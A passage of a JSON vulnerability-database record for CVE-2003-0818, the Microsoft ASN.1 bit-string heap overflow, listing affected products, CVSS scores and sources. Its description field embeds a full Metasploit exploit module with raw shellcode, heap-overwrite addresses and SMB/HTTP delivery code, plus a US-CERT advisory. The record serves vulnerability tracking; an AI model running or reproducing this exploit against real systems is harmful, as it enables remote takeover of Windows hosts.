        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.2"
      },
      {
        "model": "jukebox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.1"
      },
      {
        "model": "jukebox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.10"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.00"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.04"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.02"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.02"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.03"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.0"
      },
      {
        "model": "turbotax",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intuit",
        "version": "2003"
      },
      {
        "model": "instant messenger beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "aol",
        "version": "5.5.3415"
      },
      {
        "model": "xmlspy professional edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy professional edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy home edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy home edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy enterprise edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy enterprise edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "6.0"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "5.0.5"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "5.0"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp1"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "professional"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "server"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "advanced_server"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.8"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.7"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.6"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.5"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.0"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "2.4"
      },
      {
        "model": "small business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20000"
      },
      {
        "model": "internet explorer sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.1"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.0"
      },
      {
        "model": "exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "exchange server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_nt",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Discovery of this vulnerability has been credited to eEye Digital Security.",
    "sources": [
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2003-0818",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2003-0818",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2003-0818",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#583108",
            "trust": 0.8,
            "value": "27.72"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#216324",
            "trust": 0.8,
            "value": "27.72"
          },
          {
            "author": "NVD",
            "id": "CVE-2003-0818",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200403-040",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2003-0818",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) has a vulnerability related to integer overflow. Due to this vulnerability, arbitrary code may be executed remotely. A remote third party may execute arbitrary code with SYSTEM privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contains another nested constructed bit string. \nThis vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445).  Other components may also be affected, though a comprehensive list is not available at this time.  Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL).  The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook.  Handling of signed ActiveX components could also present an exposure. \nIt should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. \nIssues related to this vulnerability were originally covered in BID 9626 and 9743; further information has been made available which identifies that this is a distinct vulnerability in the library, and so this specific issue has been assigned an individual BID. \n** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available.  This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data.  This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted.  This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code.  Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##\n# $Id$\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/\n##\n\n\nrequire \u0027msf/core\u0027\n\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\n\tinclude Msf::Exploit::Remote::SMB\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t\u0027Name\u0027           =\u003e \u0027Microsoft ASN.1 Library Bitstring Heap Overflow\u0027,\n\t\t\t\u0027Description\u0027    =\u003e %q{\n\t\t\t\tThis is an exploit for a previously undisclosed\n\t\t\t\tvulnerability in the bit string decoding code in the\n\t\t\t\tMicrosoft ASN.1 library. Both vulnerabilities were fixed in the\n\t\t\t\tMS04-007 patch. \n\n\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\t\t\t\tthe payload fails to execute, the LSASS system service will\n\t\t\t\tcrash and the target system will automatically reboot itself\n\t\t\t\tin 60 seconds. If the payload succeeds, the system will no\n\t\t\t\tlonger be able to process authentication requests, denying\n\t\t\t\tall attempts to login through SMB or at the console. A\n\t\t\t\treboot is required to restore proper functioning of an\n\t\t\t\texploited system. \n\t\t\t\t\n\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\t\t\t\tpayloads, however a few problems were encountered when using the\n\t\t\t\tequivalent bind payloads. Your mileage may vary. \n\t\t\t\t\t\n\t\t\t},\n\t\t\t\u0027Author\u0027         =\u003e [ \u0027Solar Eclipse \u003csolareclipse@phreedom.org\u003e\u0027 ],\n\t\t\t\u0027License\u0027        =\u003e GPL_LICENSE,\n\t\t\t\u0027Version\u0027        =\u003e \u0027$Revision$\u0027,\n\t\t\t\u0027References\u0027     =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272003-0818\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u00273902\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u00279633\u0027],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],\n\t\t\t\t\t[ \u0027MSB\u0027, \u0027MS04-007\u0027],\n\n\t\t\t\t],\n\t\t\t\u0027DefaultOptions\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n\t\t\t\t},\t\t\t\t\n\t\t\t\u0027Privileged\u0027     =\u003e true,\n\t\t\t\u0027Payload\u0027        =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027Space\u0027    =\u003e 1024,\n\t\t\t\t\t\u0027StackAdjustment\u0027 =\u003e -3500,\n\t\t\t\t},\n\t\t\t\u0027Platform\u0027       =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027        =\u003e \n\t\t\t\t[\n\t\t\t\t\t[ \n\t\t\t\t\t\t\u0027Windows 2000 SP2-SP4 + Windows XP SP0-SP1\u0027, # Tested OK - 11/25/2005 hdm (bind failed)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\t\t\t},\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Feb 10 2004\u0027,\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0))\n\t\t\t\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptString.new(\u0027PROTO\u0027, [ true,  \"Which protocol to use: http or smb\", \u0027smb\u0027]),\n\t\t\t], self.class)\t\t\t\n\tend\n\n\t# This exploit is too destructive to use during automated exploitation. \n\t# Better Windows-based exploits exist at this time (Sep 2006)\n\tdef autofilter\n\t\tfalse\n\tend\n\n\t# This is a straight port of Solar Eclipse\u0027s \"kill-bill\" exploit, published\n\t# as a Metasploit Framework module with his permission. This module is only\n\t# licensed under GPLv2, keep this in mind if you embed the Framework into\n\t# a non-GPL application. -hdm[at]metasploit.com\n\n\tdef exploit\n\t\n\t\t# The first stage shellcode fixes the PEB pointer and cleans the heap\n\t\tstage0 = \n\t\t\t\"\\x53\\x56\\x57\\x66\\x81\\xec\\x80\\x00\\x89\\xe6\\xe8\\xed\\x00\\x00\\x00\\xff\"+\n\t\t\t\"\\x36\\x68\\x09\\x12\\xd6\\x63\\xe8\\xf7\\x00\\x00\\x00\\x89\\x46\\x08\\xe8\\xa2\"+\n\t\t\t\"\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\x6b\\xd0\\x2b\\xca\\xe8\\xe2\\x00\\x00\\x00\"+\n\t\t\t\"\\x89\\x46\\x0c\\xe8\\x3f\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\xfa\\x97\\x02\\x4c\"+\n\t\t\t\"\\xe8\\xcd\\x00\\x00\\x00\\x31\\xdb\\x68\\x10\\x04\\x00\\x00\\x53\\xff\\xd0\\x89\"+\n\t\t\t\"\\xc3\\x56\\x8b\\x76\\x10\\x89\\xc7\\xb9\\x10\\x04\\x00\\x00\\xf3\\xa4\\x5e\\x31\"+\n\t\t\t\"\\xc0\\x50\\x50\\x50\\x53\\x50\\x50\\xff\\x56\\x0c\\x8b\\x46\\x08\\x66\\x81\\xc4\"+\n\t\t\t\"\\x80\\x00\\x5f\\x5e\\x5b\\xff\\xe0\\x60\\xe8\\x23\\x00\\x00\\x00\\x8b\\x44\\x24\"+\n\t\t\t\"\\x0c\\x8d\\x58\\x7c\\x83\\x43\\x3c\\x05\\x81\\x43\\x28\\x00\\x10\\x00\\x00\\x81\"+\n\t\t\t\"\\x63\\x28\\x00\\xf0\\xff\\xff\\x8b\\x04\\x24\\x83\\xc4\\x14\\x50\\x31\\xc0\\xc3\"+\n\t\t\t\"\\x31\\xd2\\x64\\xff\\x32\\x64\\x89\\x22\\x31\\xdb\\xb8\\x90\\x42\\x90\\x42\\x31\"+\n\t\t\t\"\\xc9\\xb1\\x02\\x89\\xdf\\xf3\\xaf\\x74\\x03\\x43\\xeb\\xf3\\x89\\x7e\\x10\\x64\"+\n\t\t\t\"\\x8f\\x02\\x58\\x61\\xc3\\x60\\xbf\\x20\\xf0\\xfd\\x7f\\x8b\\x1f\\x8b\\x46\\x08\"+\n\t\t\t\"\\x89\\x07\\x8b\\x7f\\xf8\\x81\\xc7\\x78\\x01\\x00\\x00\\x89\\xf9\\x39\\x19\\x74\"+\n\t\t\t\"\\x04\\x8b\\x09\\xeb\\xf8\\x89\\xfa\\x39\\x5a\\x04\\x74\\x05\\x8b\\x52\\x04\\xeb\"+\n\t\t\t\"\\xf6\\x89\\x11\\x89\\x4a\\x04\\xc6\\x43\\xfd\\x01\\x61\\xc3\\xa1\\x0c\\xf0\\xfd\"+\n\t\t\t\"\\x7f\\x8b\\x40\\x1c\\x8b\\x58\\x08\\x89\\x1e\\x8b\\x00\\x8b\\x40\\x08\\x89\\x46\"+\n\t\t\t\"\\x04\\xc3\\x60\\x8b\\x6c\\x24\\x28\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\"+\n\t\t\t\"\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x38\\x49\\x8b\\x34\\x8b\\x01\\xee\"+\n\t\t\t\"\\x31\\xff\\x31\\xc0\\xfc\\xac\\x38\\xe0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\"+\n\t\t\t\"\\xf4\\x3b\\x7c\\x24\\x24\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\"+\n\t\t\t\"\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc2\"+\n\t\t\t\"\\x08\\x00\\xeb\\xfe\"\n\n\t\ttoken = spnego_token(stage0, payload.encoded)\n\t\t\n\t\tcase datastore[\u0027PROTO\u0027]\n\t\t\twhen \u0027smb\u0027\n\t\t\t\texploit_smb(token)\n\t\t\twhen \u0027http\u0027\n\t\t\t\texploit_http(token)\n\t\t\telse\n\t\t\t\tprint_status(\"Invalid application protocol specified, use smb or http\")\n\t\tend\n\tend\n\t\n\t\n\tdef exploit_smb(token)\n\t\tconnect\n\t\t\n\t\tclient = Rex::Proto::SMB::Client.new(sock)\n\n\t\tbegin\n\t\t\tclient.session_request(smb_hostname()) if not datastore[\u0027SMBDirect\u0027]\n\t\t\tclient.negotiate\n\t\t\tclient.session_setup_ntlmv2_blob(token)\n\t\trescue =\u003e e\n\t\t\tif (e.to_s =~ /error code 0x00050001/)\n\t\t\t\tprint_status(\"The target system has already been exploited\")\n\t\t\telse\n\t\t\t\tprint_status(\"Error: #{e}\")\n\t\t\tend\n\t\tend\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\tdef exploit_http(token)\n\t\tconnect\n\t\t\n\t\treq = \"GET / HTTP/1.0\\r\\n\"\n\t\treq \u003c\u003c \"Host: #{ datastore[\u0027RHOST\u0027]}\\r\\n\"\n\t\treq \u003c\u003c \"Authorization: Negotiate #{Rex::Text.encode_base64(token, \u0027\u0027)}\\r\\n\\r\\n\"\n\n\t\tsock.put(req)\n\t\tres = sock.get_once\n\t\t\n\t\tif (res and res =~ /0x80090301/)\n\t\t\tprint_status(\"This server does not support the Negotiate protocol or has already been exploited\")\n\t\tend\n\t\t\n\t\tif (res and res =~ /0x80090304/)\n\t\t\tprint_status(\"This server responded with error code 0x80090304 (wth?)\")\n\t\tend\t\t\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\n\t# Returns an ASN.1 encoded string\n\tdef enc_asn1(str)\n\t\tRex::Proto::SMB::Utils::asn1encode(str)\n\tend\n\n\t# Returns an ASN.1 encoded bit string with 0 unused bits\n\tdef enc_bits(str)\n\t\t\"\\x03\" + enc_asn1(\"\\x00\" + str)\n\tend\n\n\t# Returns a BER encoded constructed bit string\n\tdef enc_constr(*str_arr)\n\t\t\"\\x23\" + enc_asn1(str_arr.join(\u0027\u0027))\n\tend\n\n\t# Returns a BER encoded SPNEGO token\n\tdef spnego_token(stage0, stage1)\n\t\t\n\t\tif !(stage0 and stage1)\n\t\t\tprint_status(\"Invalid parameters passed to spnego_token\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif (stage0.length \u003e 1032)\n\t\t\tprint_status(\"The stage 0 shellcode is longer than 1032 bytes\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\ttag = \"\\x90\\x42\\x90\\x42\\x90\\x42\\x90\\x42\"\n\t\t\n\t\tif ((tag.length + stage1.length) \u003e 1033)\n\t\t\tprint_status(\"The stage 1 shellcode is too long\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\t\n\t\t# The first two overwrites must succeed, so we write to an unused location\n\t\t# in the PEB block. We don\u0027t care about the values, because after this the\n\t\t# doubly linked list of free blocks is corrupted and we get to the second\n\t\t# overwrite which is more useful. \n\n\t\tfw = \"\\xf8\\x0f\\x01\\x00\"\t\t# 0x00010ff8\n\t\tbk = \"\\xf8\\x0f\\x01\"\n\t\t\t\t\n\t\t# The second overwrite writes the address of our shellcode into the\n\t\t# FastPebLockRoutine pointer in the PEB\n\n\t\tpeblock = \"\\x20\\xf0\\xfd\\x7f\" # FastPebLockRoutine in PEB\n\t\t\t\n\t\tbitstring = enc_constr( \n\t\t\tenc_bits(\"A\" * 1024),\n\t\t\t\"\\x03\\x00\",\n\t\t\tenc_constr(\n\t\t\t\tenc_bits(tag + stage1 + (\"B\" * (1033-(tag+stage1).length))),\n\t\t\t\tenc_constr( enc_bits(fw + bk) ),\n\t\t\t\tenc_constr(\n\t\t\t\t\tenc_bits(\"CCCC\" + peblock + stage0 + (\"C\" * (1032-stage0.length))),\n\t\t\t\t\tenc_constr(\n\t\t\t\t\t\tenc_bits(\"\\xeb\\x06\" + make_nops(6)),\n\t\t\t\t\t\tenc_bits(\"D\" * 1040)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\ttoken = \"\\x60\" + enc_asn1(                 # Application Constructed Object\n\t\t\t\"\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\" +   # SPNEGO OID\n\t\t\t\"\\xa0\" + enc_asn1(\t\t\t\t\t   # NegTokenInit (0xa0)\n\t\t\t\t\"\\x30\" + enc_asn1(\n\t\t\t\t\t\"\\xa1\" + enc_asn1(\n\t\t\t\t\t\tbitstring\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\treturn token\t\n\tend\n\nend\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nMultiple Vulnerabilities in Microsoft ASN.1 Library\n\n   Original issue date: February 10, 2004\n   Last revised: --\n   Source: US-CERT\n\n   A complete revision history is at the end of this document.  According to information from eEye Digital Security,\n   the vulnerabilities involve integer overflows and other flaws in\n   integer arithmetic. \n\n   Any application that loads the ASN.1 library could serve as an attack\n   vector. In particular, ASN.1 is used by a number of cryptographic and\n   authentication services such as digital certificates (x.509),\n   Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are\n   affected. The Local Security Authority Subsystem (lsass.exe) and a\n   component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1\n   library. \n\nSolution\n\nApply a patch\n\n   Apply the appropriate patch as specified by Microsoft Security\n   Bulletin MS04-007. \n\nVendor Information\n\n   This appendix contains information provided by vendors. When vendors\n   report new information, this section is updated and the changes are\n   noted in the revision history. If a vendor is not listed below, we\n   have not received their comments. \n\nMicrosoft\n\n     Please see Microsoft Security Bulletin MS04-007. \n\nReferences\n\n     * Vulnerability Note VU#216324 -\n       \u003chttp://www.kb.cert.org/vuls/id/216324\u003e\n     * Vulnerability Note VU#583108 -\n       \u003chttp://www.kb.cert.org/vuls/id/583108\u003e\n     * eEye Digital Security Advisory AD20040210 -\n       \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210.html\u003e\n     * eEye Digital Security Advisory AD20040210-2 -\n       \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210-2.html\u003e\n     * Microsoft Security Bulletin MS04-007 -\n       \u003chttp://microsoft.com/technet/security/bulletin/MS04-007.asp\u003e\n     * Microsoft Knowledge Base Article 252648 -\n       \u003chttp://support.microsoft.com/default.aspx?scid=252648\u003e\n     _________________________________________________________________\n\n   These vulnerabilities were researched and reported by eEye Digital\n   Security. Information from eEye and Microsoft was used in this\n   document. \n     _________________________________________________________________\n\n   Feedback can be directed to the author, Art Manion. \n\n   Copyright 2004 Carnegie Mellon University. \n\n   Revision History\n\n   February 10, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW\n5hU8LQ/oOC4sI8PpnkppCyg=\n=Oe/N\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      },
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "JVNDB",
